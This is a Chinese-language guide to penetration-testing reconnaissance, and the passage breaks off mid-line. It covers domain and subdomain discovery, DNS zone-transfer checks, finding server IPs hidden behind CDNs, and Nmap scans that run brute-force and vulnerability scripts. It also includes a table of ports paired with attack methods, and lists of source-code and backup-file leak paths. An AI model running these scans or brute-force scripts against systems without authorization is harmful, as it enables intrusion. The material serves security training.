[常用扫描工具使用](#常用扫描工具使用) - [Nmap](#nmap-1) - [Masscan](#masscan) - [Masscan+Nmap](#masscannmap) - [masnmapscan](#masnmapscan) - [Zmap](#zmap) - [御剑高速TCP端口扫描工具](#御剑高速tcp端口扫描工具) - [御剑高速端口扫描工具](#御剑高速端口扫描工具) - [网络空间引擎搜索](#网络空间引擎搜索-1) - [浏览器插件](#浏览器插件-1) - [Shodan](#shodan) - [TCPIPUTILS](#tcpiputils-1) - [DNSlytics](#dnslytics-2) - [fofa-view](#fofa-view) - [指纹识别](#指纹识别) - [第三方平台](#第三方平台) - [工具](#工具) - [浏览器插件](#浏览器插件-2) - [Wappalyzer](#wappalyzer) - [收集敏感信息](#收集敏感信息) - [WAF识别](#waf识别) - [wafw00f](#wafw00f) - [源码泄露](#源码泄露) - [常见源码泄露](#常见源码泄露) - [源码泄露扫描工具](#源码泄露扫描工具) - [源码泄露利用工具](#源码泄露利用工具) - [备份文件泄露](#备份文件泄露) - [网站备份文件泄露常见名称](#网站备份文件泄露常见名称) - [网站备份文件泄露常见后缀](#网站备份文件泄露常见后缀) - [网站备份文件泄露扫描工具](#网站备份文件泄露扫描工具) - [Google Hacking](#google-hacking) - [GoogleHacking常用语法](#googlehacking常用语法) - [GoogleHacking其他语法](#googlehacking其他语法) - [GoogleHackingDatabase](#googlehackingdatabase) - [GoogleHacking典型用法](#googlehacking典型用法) - [JS获取敏感接口](#js获取敏感接口) - [JSFinder](#jsfinder) - [LinkFinder](#linkfinder) - [目录&后台扫描](#目录后台扫描) - [越权查询](#越权查询) - [代码托管](#代码托管) - [Whois&备案查询](#whois备案查询) - [公网网盘](#公网网盘) - [凌风云搜索](#凌风云搜索) - [小白盘搜索](#小白盘搜索) - [大力盘搜索](#大力盘搜索) - [小不点搜索(微盘)](#小不点搜索微盘) - [百度网盘爬取开源工具](#百度网盘爬取开源工具) - [网站截图](#网站截图) - [webscreenshot](#webscreenshot) - [获取公开文件](#获取公开文件) - [snitch](#snitch) - [Google Hacking](#google-hacking-1) - [邮箱信息收集](#邮箱信息收集) - [Infoga](#infoga) - [Google Hacking](#google-hacking-2) - [Online Search Email](#online-search-email) - [历史资产](#历史资产) - [wayback](#wayback) - [漏洞公共资源库](#漏洞公共资源库) - [国内](#国内) - [国外](#国外) - [社会工程](#社会工程) - [SheGongKu](#shegongku) - [UserRegistrationInformation](#userregistrationinformation) - [IPInformation](#ipinformation) - [SomeProjects](#someprojects) # 收集域名信息 知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。 ## Whois 查询 Whois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期、DNS等)。通过域名Whois服务器查询,可以查询域名归属者联系方式,以及注册和到期时间。 - [Kali下whois查询](https://www.kali.org/downloads/) - [域名Whois查询 - 站长之家](http://whois.chinaz.com/) - [Whois 爱站](http://whois.aizhan.com/) - [ip138 ](https://site.ip138.com/) - [Whois Lookup ](https://www.whois.net/) - [ICANN Lookup ](https://lookup.icann.org/) - [域名信息查询 - 腾讯云](https://whois.cloud.tencent.com/domain?domain=) - [nicolasbouliane ](http://nicolasbouliane.com/utils/whois/?url=http://baidu.com) - [新网 whois信息查询 ](http://whois.xinnet.com/) - [IP WHOIS查询 - 站长工具 ](http://tool.chinaz.com/ipwhois/) ![](img/1594459-20200119141241842-1090421140.png) ## 备案信息查询 国内网站注册需要向国家有关部门申请备案,防止网站从事非法活动,而国外网站不需要备案2333。 - [ICP备案查询网](http://www.beianbeian.com/) - [ICP备案查询-站长工具](http://icp.chinaz.com/) - [SEO综合查询-爱站](https://www.aizhan.com/seo/) - [批量查询-站长工具](http://icp.chinaz.com/searchs) - [工业和信息化部ICP/IP/域名信息备案管理](http://www.beian.miit.gov.cn/publish/query/indexFirst.action) - [美国企业备案查询](https://www.sec.gov/edgar/searchedgar/companysearch.html) ![](img/1594459-20200119141328662-1538613661.png) ## 信用信息查询 - [国家企业信用信息公示系统](http://www.gsxt.gov.cn/index.html) - [悉知-全国企业信息查询](http://company.xizhi.com/) - [信用中国-个人信用查询搜索-企业信息查询搜索-统一社会信用代码查询](https://www.creditchina.gov.cn/) ![](img/1594459-20200119141415498-1786131287.png) ## IP反查站点的站 ### 在线网站 #### Dnslytics - Dnslytics地址:https://dnslytics.com/ 利用Dnslytics反查IP可以得到如下信息 ``` IP information Network information Hosting information SPAM database lookup Open TCP/UDP ports Blocklist lookup Whois information Geo information Country information Update information ``` 利用Dnslytics反查域名可以得到如下信息 ``` Domain and Ranking Information Hosting Information{ A / AAAA Record NS Record MX Record SPF Record } Web Information Whois Information ``` ## 浏览器插件 通过Google、FireFox等插件的使用,收集域名信息 ### myip.ms ![](img/1594459-20200119141519415-625881985.png) ### TCPIPUTILS ![](img/1594459-20200119141640228-860131966.png) ### DNSlytics ![](img/1594459-20200119141656601-1094084026.png) # 收集相关应用信息 - [天眼查](https://www.tianyancha.com/) - [企查查](https://www.qichacha.com/) - [七麦数据](https://www.qimai.cn/) - [AppStore](https://apps.apple.com/) ## 微信公众号&微博 ### 天眼查 - [天眼查-商业安全工具](https://www.tianyancha.com/) 根据前面获取的企业名称可以获取目标企业的微信公众号、微博、备案站点、软件著作权等信息。 ![](img/1594459-20200119141713825-233472966.png) 微信公众号 ![](img/1594459-20200119141726618-1965423664.png) 微博 ![](img/1594459-20200119141739367-2099794631.png) ## APP ### 七麦数据 - [七麦数据](https://www.qimai.cn/) 通过当前APP查询同开发商应用,得到目标所有APP应用 ![](img/1594459-20200119141752877-1887884798.png) ### AppStore - [AppStore](https://apps.apple.com/) 通过当前APP查询同开发商应用,得到目标所有APP应用 ![](img/1594459-20200119141813027-1838023080.png) # 收集子域名信息 子域名也就是二级域名,是指顶级域名下的域名。假设我们的目标网络规模比较大,直接从主域入手显然是很不理智的,因为对于这种规模的目标,一般其主域都是重点防护区域,所以不如先进入目标的某个子域,然后再想办法迂回接近真正的目标,这无疑是个比较好的选择。那么问题来了,怎样才能尽可能多地搜集目标的高价值子域呢?常用的方法有以下这几种。 ## 在线平台 ### 第三方平台查询 主要是一些第三方网站和一些博主提供的服务 - [ip138](https://site.ip138.com/) - [站长工具](http://tool.chinaz.com/subdomain/?domain=) - [hackertarget](https://hackertarget.com/find-dns-host-records/) - [phpinfo](https://phpinfo.me/domain/) - [t1h2ua](https://www.t1h2ua.cn/tools/) - [dnsdumpster](https://dnsdumpster.com/) - [chinacycc](https://d.chinacycc.com/) - [zcjun](http://z.zcjun.com/) ### 权重综合查询 - [爱站](https://www.aizhan.com/seo/) - [站长工具](http://rank.chinaz.com/all/) ![](img/1594459-20200119141832218-1345938531.png) ### 全国政府网站基本数据库 - [Address Link](http://114.55.181.28/databaseInfo/index) ![](img/1594459-20200119141843251-1646076497.png) ### IP反查绑定域名网站 IP关联域名,大部分网站一个IP多个域名 - [chinaz](http://s.tool.chinaz.com/same?s) - [aizhan](http://dns.aizhan.com/) - [webscan.cc](https://webscan.cc/) ## 资产搜索引擎 google、shodan、FOFA、zoomeye ### Google语法查询 搜索子域名 "site:xxxxx" ``` site:baidu.com ``` ![](img/1594459-20200119141902637-725688631.png) ### FOFA语法查询 - [fofa.so](https://fofa.so/) 搜索子域名 "domain:xxxxx" ``` domain="baidu.com" ``` ![](img/1594459-20200119141919931-1425149530.png) ## 工具枚举 常用子域名工具如下(Github上都可搜到) ``` OneForAll Layer Sublist3r subDomainsBrute K8 wydomain dnsmaper dnsbrute Findomain fierce等 ``` 个人推荐:`OneForAll`、`Layer`、`Sublist3r`、`subDomainsBrute` ### OneForAll OneForAll是一款功能强大的子域收集工具,拥有多个模块和接口扫描,收集子域信息很全,包括子域、子域IP、子域常用端口、子域Title、子域Banner、子域状态等。 项目地址:`https://github.com/shmilylty/OneForAll` 子域名收集:`python3 oneforall.py --target=target.com run` ![](img/1594459-20200119141949690-706245006.png) ### Layer Layer子域名挖掘机的使用方法比较简单,在域名对话框中直接输入域名就可以进行扫描,它的显示界面比较细致,有域名、解析IP、开放端口、Web服务器和网站状态等 ![](img/1594459-20200119142000597-497061730.png) ### subDomainsBrute subDomainsBrute的特点是可以用小字典递归地发现三级域名、四级域名,甚至五级域名等不容易被探测到的域名。 项目地址:`https://github.com/lijiejie/subDomainsBrute` 子域名收集:`python subDomainsbrute.py xtarget.com` ### Sublist3r Sublist3r也是一个比较常用的工具, 它能列举多种资源,如在Google、Yahoo、 Bing、 Baidu和Ask等搜索引擎中可查到的子域名,还可以列出Netcraft、VirusTotal、ThreatCrowd、 DNSdumpster、SSL Certificates、和Reverse DNS查到的子域名。 项目地址:`https://github.com/aboul3la/Sublist3r` 子域名收集:`python sublist3r.py -d target.com -b -t 50 -p 80,443,21,22` ![](img/1594459-20200119142016505-176536179.png) ## 证书透明度公开日志枚举 证书透明度(Certificate Transparency, CT)是证书授权机构(CA) 的一个项目,证书授权机构会将每个SSL/TLS证书发布到公共日志中。一个SSL/TLS证书通常包含域名、子域名和邮件地址, 这些也经常成为攻击者非常希望获得的有用信息。查找某个域名所属证书的最简单的方法就是使用搜索引|擎搜索一些公开的CT日志。 ### 在线第三方平台查询 - [crt.sh](https://crt.sh) - [censys](https://censys.io) - [myssl](https://myssl.com) ``` crt: https://crt.sh/?q=baidu.com ``` ![](img/1594459-20200119142032842-592842557.png) ![](img/1594459-20200119142046971-121764509.png) ``` censys: https://www.censys.io/certificates?q=baidu.com ``` ![](img/1594459-20200119142058672-37856097.png) ### 工具枚举查询 通过工具可以调用各个证书接口进行域名查询 常用工具 ``` Findomain Sublist3r(SSL Certificates)等 ``` #### Findomain Findomain不使用子域名寻找的常规方法,而是使用证书透明度日志来查找子域,并且该方法使其工具更加快速和可靠。该工具使用多个公共API来执行搜索: ``` Certspotter Crt.sh Virustotal Sublist3r Facebook Spyse (CertDB) Bufferover Threadcrow Virustotal with apikey ``` 项目地址:`https://github.com/Edu4rdSHL/findomain` 子域名收集:`findomain -t target.com ` 使用所有API搜索子域并将数据导出到CSV文件:`findomain -t target.com -a -o csv` ## DNS历史解析 - [dnsdb](https://www.dnsdb.io) - [viewdns](https://viewdns.info/) ## DNS域传送漏洞 目前来看"DNS域传送漏洞"已经很少了。 ### DNS记录分类 常见的DNS记录有以下几类: ``` A记录 IP地址记录,记录一个域名对应的IP地址 AAAA记录 IPv6地址记录,记录一个域名对应的IPv6地址 CNAME记录 别名记录,记录一个主机的别名 MX记录 电子邮件交换记录,记录一个邮件域名对应的IP地址 NS记录 域名服务器记录 ,记录该域名由哪台域名服务器解析 PTR记录 反向记录,也即从IP地址到域名的一条记录 TXT记录 记录域名的相关文本信息 ``` ### DNS注册信息 Whois查询 ### DNS域传送漏洞原理 DNS服务器分为:`主服务器`、`备份服务器`和`缓存服务器`。在主备服务器之间同步数据库,需要使用`“DNS域传送”`。域传送是指备份服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。 若DNS服务器配置不当,可能导致攻击者获取某个域的所有记录。造成整个网络的拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器。同时,黑客可以快速的判定出某个特定zone的所有主机,收集域信息,选择攻击目标,找出未使用的IP地址,绕过基于网络的访问控制。 ### DNS域传送漏洞检测 #### nslookup 基本过程 ``` 1) nslookup #进入交互式shell 2) server dns.xx.yy.zz #设定查询将要使用的DNS服务器 3) ls xx.yy.zz #列出某个域中的所有域名 4) exit #退出 ``` 漏洞检验-不存在漏洞 ``` > nslookup Server: lkwifi.cn Address: 192.168.68.1 *** lkwifi.cn can't find nslookup: Non-existent domain > server ss2.bjfu.edu.cn Default Server: ss2.bjfu.edu.cn Address: 202.204.112.67 > ls bjfu.edu.cn [ss2.bjfu.edu.cn] *** Can't list domain bjfu.edu.cn: Query refused The DNS server refused to transfer the zone bjfu.edu.cn to your computer. If this is incorrect, check the zone transfer security settings for bjfu.edu.cn on the DNS server at IP address 202.204.112.67. > exit ``` 漏洞检验-存在漏洞 ``` > nslookup > server dns1.xxx.edu.cn > ls xxx.edu.cn ``` ![](img/1594459-20200119142122378-365876425.png) #### nmap 利用nmap漏洞检测脚本"dns-zone-transfer"进行检测 ``` nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxx.edu.cn -p 53 -Pn dns.xxx.edu.cn ``` ``` --script dns-zone-transfer 表示加载nmap漏洞检测脚本dns-zone-transfer.nse,扩展名.nse可省略 --script-args dns-zone-transfer.domain=xxx.edu.cn 向脚本传递参数,设置列出某个域中的所有域名 -p 53 设置扫描53端口 -Pn 设置通过Ping发现主机是否存活 ``` ![](img/1594459-20200119142135615-565066925.png) #### dig 使用说明 `dig -h` 漏洞测试 ``` dig @dns.xxx.edu.cn axfr xxx.edu.cn ``` `axfr` 是q-type类型的一种: axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。 ![](img/1594459-20200119142148997-23789284.png) # 查找真实IP 如果挖掘的目标购买了CDN服务,可以直接ping目标的域名,但得到的并非真正的目标Web服务器,只是离我们最近的一台目标节点的CDN服务器,这就导致了我们没法直接得到目标的真实IP段范围。 ## CDN简介 CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。 ## 国内外CDN 国内常见CDN ``` 阿里云 腾讯云 百度云 网宿科技(ChinanNet Center) 蓝汛 金山云 UCloud 网易云 世纪互联 七牛云 京东云等 ``` 国外常见CDN ``` Akamai(阿卡迈) Limelight Networks(简称LLNW) AWS Cloud(亚马逊) Google(谷歌) Comcast(康卡斯特) ``` ## 判断目标是否存在CDN 由于CDN需要代价,一般小企业很大几率不会存在CDN服务。 假如一些企业存在CDN服务,那该如何寻找其真实IP呢,往下看,常见几种手法 ### Ping目标主域 通常通过ping目标主域,观察域名的解析情况,以此来判断其是否使用了CDN 对京东和阿里还有一家电器企业进行ping测试,观察域名的解析情况,可以看到京东和阿里都采用了自家CDN,而那个电器企业没有CDN服务 ``` C:\Users\Qftm>ping www.jd.com C:\Users\Qftm>ping www.alibaba.com C:\Users\Qftm>ping www.dfle.com.cn ``` ![](img/1594459-20200119142212459-2087766300.png) ### Nslookup #### 不同DNS域名解析 不同DNS域名解析情况对比,判断其是否使用了CDN 不同DNS解析结果若不一样,很有可能存在CDN服务 ``` C:\Users\Qftm>nslookup www.dfle.com.cn 8.8.8.8 C:\Users\Qftm>nslookup www.dfle.com.cn 114.114.114.114 ``` ![](img/1594459-20200119142328428-196307471.png) ``` λ Qftm >>>: nslookup www.baidu.com 8.8.8.8 λ Qftm >>>: nslookup www.baidu.com 114.114.114.114 ``` ![](img/1594459-20200119142343947-148948923.png) #### nslookup默认解析 若解析结果有多个,很有可能存在CDN,相反,若解析结果有一个,可能不存在CDN(不能肯定) ![](img/1594459-20200119142357248-1150922309.png) ### 全国Ping 利用全国多地区的ping服务器操作,然后对比每个地区ping出的IP结果,查看这些IP是否一致, 如果都是一样的,极有可能不存在CDN。如果IP大多不太一样或者规律性很强,可以尝试查询这些IP的归属地,判断是否存在CDN。 在线网址 - [Ping检测-站长工具](http://ping.chinaz.com/) - [17CE](https://www.17ce.com/) - [ipip (支持国内、国外)](https://tools.ipip.net/newping.php) #### 站长工具 测试目标:`www.jd.com` ![](img/1594459-20200119142412648-1190613587.png) #### 17CE 测试目标:`www.baidu.com` ![](img/1594459-20200119142428869-1621577710.png) #### IPIP ![](img/1594459-20200119142440363-2056134896.png) ### 工具查询 这里工具只能作为辅助,有一定误报的概率,只能作为参考 #### Cdnplanet - [cdnplanet](https://www.cdnplanet.com/tools/cdnfinder/) (查询可能比较慢) ![](img/1594459-20200119142452928-266810115.png) ## 绕过CDN查找真实IP 在确认了目标确实用了CDN以后,就需要绕过CDN寻找目标的真实IP,下面介绍一些常规的方法。 ### 内部邮箱源 一般的邮件系统都在内部,没有经过CDN的解析,通过利用目标网站的邮箱注册、找回密码或者RSS订阅等功能,查看邮件、寻找邮件头中的邮件服务器域名IP,ping这个邮件服务器的域名,就可以获得目标的真实IP。 注意:必须是目标自己的邮件服务器,第三方或公共邮件服务器是没有用的。 ![](img/1594459-20200119142511035-408073430.png) ### 国外请求 很多时候国内的CDN对国外得覆盖面并不是很广,故此可以利用此特点进行探测。通过国外代理访问就能查看真实IP了,或者通过国外的DNS解析,可能就能得到真实的IP。 #### 国际Ping 国际ping测试站点 - [ipip](https://tools.ipip.net/newping.php) - [ASM](https://asm.ca.com/en/ping.php) 测试站点:`www.yeah.net` ![](img/1594459-20200119142526549-567642204.png) #### 国外DNS解析 - [世界各地DNS服务器地址大全](http://www.ab173.com/dns/dns_world.php) 测试站点:`www.yeah.net` 美国加利福尼亚州山景市谷歌公司DNS服务器: `8.8.4.4` ![](img/1594459-20200119142541360-1030049461.png) ### 分站域名&C段查询 很多网站主站的访问量会比较大,所以主站都是挂CDN的,但是分站可能没有挂CDN,可以通过ping二级域名获取分站IP, 可能会出现分站和主站不是同一个IP但在同一个C段下面的情况,从而能判断出目标的真实IP段。 #### 分站域名 具体见上面 **<收集子域名信息>** 部分 ![](img/1594459-20200119142552726-920748840.png) #### C段查询 * 在线查询 ``` https://phpinfo.me/bing.php ``` ![](img/1594459-20200119142607848-1081123689.png) * 工具 `K8_C段旁注工具6.0`、`nmap`、`IISPutScanner`、`小米范WEB查找器` 等 `小米范WEB查找器`:http://pan.baidu.com/s/1pLjaQKF ![](img/1594459-20200119142618307-1998638289.png) * 网络资产搜索引擎 Fofa、Shodan、ZoomEye 利用这些网络空间资产搜索引擎来搜索暴露在外的端口信息 利用语法搜索C段信息 ![](img/1594459-20200119142628605-1817173510.png) ### 网站漏洞 通过网站的信息泄露如phpinfo泄露,github信息泄露,命令执行等漏洞获取真实ip。 #### 一些测试文件 phpinfo、test等 ![](img/1594459-20200119142643031-2126170556.png) #### SSRF漏洞 服务器主动向外发起连接,找到真实IP地址 ### 查询域名解析记录 一般网站从部署开始到使用cdn都有一个过程,周期如果较长的话 则可以通过这类历史解析记录查询等方式获取源站ip,查看IP与域名绑定的历史记录,可能会存在使用CDN前的记录。 在线网站查询 - [dnsdb](https://www.dnsdb.io) - [NETCRAFT](https://sitereport.netcraft.com/?url=) - [viewdns](https://viewdns.info/) - [threatbook](https://x.threatbook.cn/) - [securitytrails](https://securitytrails.com/) ![](img/1594459-20200119142656200-2052041466.png) ### 目标网站APP应用 如果目标网站有自己的App,可以尝试利用Fiddler或Burp Suite抓取App的请求,从里面找到目标的真实IP。 ### 网络空间引擎搜索 shodan、FOFA、zoomeye # 收集常用端口信息 在对目标进行漏洞挖掘的过程中,对端口信息的收集是一个很重要的过程, 通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于我们渗透目标服务器。 所以在端口渗透信息的收集过程中,我们需要关注常见应用的默认端口和在端口上运行的服务。 端口一般是指TCP/IP协议中的端口,端口号的范围是从0-65535。 ## 常见端口&解析&总结 常用的端口利用及解析总结 ``` 端口:21 服务:FTP/TFTP/VSFTPD 总结:爆破/嗅探/溢出/后门 端口:22 服务:ssh远程连接 总结:爆破/openssh漏洞 端口:23 服务:Telnet远程连接 总结:爆破/嗅探/弱口令 端口:25 服务:SMTP邮件服务 总结:邮件伪造 端口:53 服务:DNS域名解析系统 总结:域传送/劫持/缓存投毒/欺骗 端口:67/68 服务:dhcp服务 总结:劫持/欺骗 端口:110 服务:pop3 总结:爆破/嗅探 端口:139 服务:Samba服务 总结:爆破/未授权访问/远程命令执行 端口:143 服务:Imap协议 总结:爆破161SNMP协议爆破/搜集目标内网信息 端口:389 服务:Ldap目录访问协议 总结:注入/未授权访问/弱口令 端口:445 服务:smb 总结:ms17-010/端口溢出 端口:512/513/514 服务:Linux Rexec服务 总结:爆破/Rlogin登陆 端口:873 服务:Rsync服务 总结:文件上传/未授权访问 端口:1080 服务:socket 总结:爆破 端口:1352 服务:Lotus domino邮件服务 总结:爆破/信息泄漏 端口:1433 服务:mssql 总结:爆破/注入/SA弱口令 端口:1521 服务:oracle 总结:爆破/注入/TNS爆破/反弹shell2049Nfs服务配置不当 端口:2181 服务:zookeeper服务 总结:未授权访问 端口:2375 服务:docker remote api 总结:未授权访问 端口:3306 服务:mysql 总结:爆破/注入 端口:3389 服务:Rdp远程桌面链接 总结:爆破/shift后门 端口:4848 服务:GlassFish控制台 总结:爆破/认证绕过 端口:5000 服务:sybase/DB2数据库 总结:爆破/注入/提权 端口:5432 服务:postgresql 总结:爆破/注入/缓冲区溢出 端口:5632 服务:pcanywhere服务 总结:抓密码/代码执行 端口:5900 服务:vnc 总结:爆破/认证绕过 端口:6379 服务:Redis数据库 总结:未授权访问/爆破 端口:7001/7002 服务:weblogic 总结:java反序列化/控制台弱口令 端口:80/443 服务:http/https 总结:web应用漏洞/心脏滴血 端口:8069 服务:zabbix服务 总结:远程命令执行/注入 端口:8161 服务:activemq 总结:弱口令/写文件 端口:8080/8089 服务:Jboss/Tomcat/Resin 总结:爆破/PUT文件上传/反序列化 端口:8083/8086 服务:influxDB 总结:未授权访问 端口:9000 服务:fastcgi 总结:远程命令执行 端口:9090 服务:Websphere 总结:控制台爆破/java反序列化/弱口令 端口:9200/9300 服务:elasticsearch 总结:远程代码执行 端口:11211 服务:memcached 总结:未授权访问 端口:27017/27018 服务:mongodb 总结:未授权访问/爆破 ``` 详细参考:[掘安攻防实验室](https://mp.weixin.qq.com/s/Y0PPqyHysBPmgmDw2KmHYw) ## 扫描工具 ### 常用扫描工具 ``` Nmap Masscan masnmapscan ZMap 御剑高速TCP端口扫描工具 御剑高速端口扫描工具 IISPutScanner IISPutScanner增强版-DotNetScan v1.1 Beta ``` ### 常用扫描工具使用 #### Nmap 项目地址:`https://github.com/nmap/nmap` * 扫描多个IP ``` 扫描整个子网 nmap 192.168.6.1/24 nmap 192.168.1.1/16 nmap 192.168.1-30.1-254 nmap 192.168.1-254.6 扫描多个主机 namp 192.168.6.2 192.168.6.6 扫描一个小范围 nmap 192.168.6.2-10 扫描txt内的ip列表 nmap -iL text.txt 扫描除某个目标外 nmap 192.168.6.1/24 -exclude 192.168.6.25 ``` * 绕过Firewalld扫描主机端口 通过不同的协议(TCP半连接、TCP全连接、ICMP、UDP等)的扫描绕过Firewalld的限制 ``` nmap -sP 192.33.6.128 nmap -sT 192.33.6.128 nmap -sS 192.33.6.128 nmap -sU 192.33.6.128 nmap -sF 192.33.6.128 nmap -sX 192.33.6.128 nmap -sN 192.33.6.128 ``` * 初步扫描端口信息 ``` nmap -T4 -A -v -Pn 192.168.1.1/24 -p 21,22,23,25,80,81,82,83,88,110,143,443,445,512,513,514,1433,1521,2082,2083,2181,2601,2604,3128,3306,3389,3690,4848,5432,5900,5984,6379,7001,7002,8069,8080,8081,8086,8088,9200,9300,11211,10000,27017,27018,50000,50030,50070 -oN nmap_result.txt ``` ![](img/1594459-20200119150735085-1154381786.png) * 扫描端口并且标记可以爆破的服务 ``` nmap 127.0.0.1 --script=ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute ``` ![](img/1594459-20200119142721442-1575053305.png) * 判断常见的漏洞并扫描端口 ``` nmap 127.0.0.1 --script=auth,vuln ``` ![](img/1594459-20200119142731949-1278292617.png) * 精确判断漏洞并扫描端口 ``` nmap 127.0.0.1 --script=dns-zone-transfer,ftp-anon,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-backup-finder,http-cisco-anyconnect,http-iis-short-name-brute,http-put,http-php-version,http-shellshock,http-robots.txt,http-svn-enum,http-webdav-scan,iis-buffer-overflow,iax2-version,memcached-info,mongodb-info,msrpc-enum,ms-sql-info,mysql-info,nrpe-enum,pptp-version,redis-info,rpcinfo,samba-vuln-cve-2012-1182,smb-vuln-ms08-067,smb-vuln-ms17-010,snmp-info,sshv1,xmpp-info,tftp-enum,teamspeak2-version ``` #### Masscan 项目地址:`https://github.com/robertdavidgraham/masscan` Masscan主要是真对全网进行端口扫描 #### Masscan+Nmap 有些时候网站的入口点属于非常规端口,因此是必须要做全端口扫描,做全端口扫描的时候由于**namp**发包量大经常出现各种问题,如端口扫描不全、获得信息不准等等,为了解决上述问题,这里提供一个**masscan+nmap**结合的方式进行快速扫描。 原理:使用masscan做全端口开放检测,检测出来端口信息后,用nmap进行服务信息识别。 使用:终端输入以下命令执行即可 ``` # masscan 192.33.6.145 -p1-65535 --rate 1000 -oL ports # ports=$(cat ports | awk -F " " '{print $3}' | sort -n | tr '\n' ',' | sed 's/,$//' | sed 's/^,,//') # nmap -sV -p $ports 192.33.6.145 ``` #### masnmapscan 项目地址:`https://github.com/hellogoldsnakeman/masnmapscan-V1.0` masnmapscan整合了masscan和nmap两款扫描器,masscan扫描端口,nmap扫描端口对应服务,二者结合起来实现了又快又好地扫描。并且加入了针对目标资产有防火墙的应对措施。 #### Zmap 项目地址:`https://github.com/zmap/zmap` Zmap主要是真对全网进行端口扫描 #### 御剑高速TCP端口扫描工具 ![](img/1594459-20200119142744950-434617774.png) #### 御剑高速端口扫描工具 ![](img/1594459-20200119142757545-1040489796.png) ## 网络空间引擎搜索 shodan、FOFA、zoomeye FOFA为例 - [fofa.so](https://fofa.so/) ![](img/1594459-20200119142808985-1292014262.png) ## 浏览器插件 通过Google、FireFox等插件的使用,收集主机端口开放信息 ### Shodan ![](img/1594459-20200119142819024-1802418948.png) ### TCPIPUTILS ![](img/1594459-20200119142829090-1787287221.png) ### DNSlytics ![](img/1594459-20200119142839382-1486144346.png) ### fofa-view ![](img/1594459-20200119162240355-550566949.png) # 指纹识别 在漏洞挖掘中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。 CMS (Content Management System)又称整站系统或文章系统。常见的CMS有Dedecms (织梦)、Discuz、 PHPWEB、 PHPWind、PHPCMS、ECShop、 Dvbbs、 SiteWeaver、 ASPCMS、帝国、Z- Blog、WordPress等。 ## 第三方平台 - [云悉](http://www.yunsee.cn/) - [TideFinger](http://finger.tidesec.net/) - [BugScaner](http://whatweb.bugscaner.com/look/) - [数字观星](https://fp.shuziguanxing.com/#/) ![](img/1594459-20200119142854987-277705405.png) ## 工具 常用指纹识别工具有:`御剑Web指纹识别`、`WhatWeb`、`Test404轻量CMS指纹识别+v2.1`、`椰树`等,可以快速识别一些主流CMS ![](img/1594459-20200119142905515-1626640337.png) Github项目 - [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) - [CMSmap](https://github.com/Dionach/CMSmap) - [ACMSDiscovery](https://github.com/aedoo/ACMSDiscovery) - [TideFinger](https://github.com/TideSec/TideFinger) - [AngelSword](https://github.com/Lucifer1993/AngelSword) ![](img/1594459-20200119152155149-1636869790.png) ## 浏览器插件 通过Google、FireFox等插件的使用,收集网站结构信息 ### Wappalyzer ![](img/1594459-20200119142916899-799352136.png) # 收集敏感信息 对应站点和应用敏感信息收集的越多,后续攻击利用突破口越多。 ## WAF识别 识别网站使用的什么WAF,可以去找相应的绕过手段 ### wafw00f - 项目地址:https://github.com/EnableSecurity/wafw00f ![](img/1594459-20200119142930233-1332790706.png) ## 源码泄露 ### 常见源码泄露 ``` /.bzr/ /CVS/Entries /CVS/Root /.DS_Store MacOS自动生成 /.hg/ /.svn/ (/.svn/entries) /.git/ /WEB-INF/src/ /WEB-INF/lib/ /WEB-INF/classes/ /WEB-INF/database.properties /WEB-INF/web.xml Robots.txt ``` 上述源码泄露在Github上都可以找到相应的利用工具 ### 源码泄露扫描工具 将常见源码泄露加入字典配合FUZZ、御剑等扫描器进行扫描收集 ### 源码泄露利用工具 - .git源码泄露:https://github.com/lijiejie/GitHack - .DS_Store泄露:https://github.com/lijiejie/ds_store_exp - .bzr、CVS、.svn、.hg源码泄露:https://github.com/kost/dvcs-ripper ## 备份文件泄露 ### 网站备份文件泄露常见名称 ``` backup db data web wwwroot database www code test admin user sql ``` ### 网站备份文件泄露常见后缀 ``` .bak .html _index.html .swp .rar .txt .zip .7z .sql .tar.gz .tgz .tar ``` ### 网站备份文件泄露扫描工具 常见扫描工具有:Test404网站备份文件扫描器 v2.0、ihoneyBakFileScan等 ihoneyBakFileScan v0.2 多进程批量网站备份文件泄露扫描工具,根据域名自动生成相关扫描字典,自动记录扫描成功的备份地址到文件 ![](img/1594459-20200119142945747-1732902549.png) ## Google Hacking ### GoogleHacking常用语法 1、intext:(仅针对Google有效) 把网页中的正文内容中的某个字符作为搜索的条件 2、intitle: 把网页标题中的某个字符作为搜索的条件 3、cache: 搜索搜索引擎里关于某些内容的缓存,可能会在过期内容中发现有价值的信息 4、filetype/ext: 指定一个格式类型的文件作为搜索对象 5、inurl: 搜索包含指定字符的URL 6、site: 在指定的(域名)站点搜索相关内容 ### GoogleHacking其他语法 1、引号 '' " 把关键字打上引号后,把引号部分作为整体来搜索 2、or 同时搜索两个或更多的关键字 3、link 搜索某个网站的链接 link:baidu.com即返回所有和baidu做了链接的URL 4、info 查找指定站点的一些基本信息 ### GoogleHackingDatabase - [google-hacking-database](https://www.exploit-db.com/google-hacking-database) ### GoogleHacking典型用法 - 管理后台地址 ``` site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | 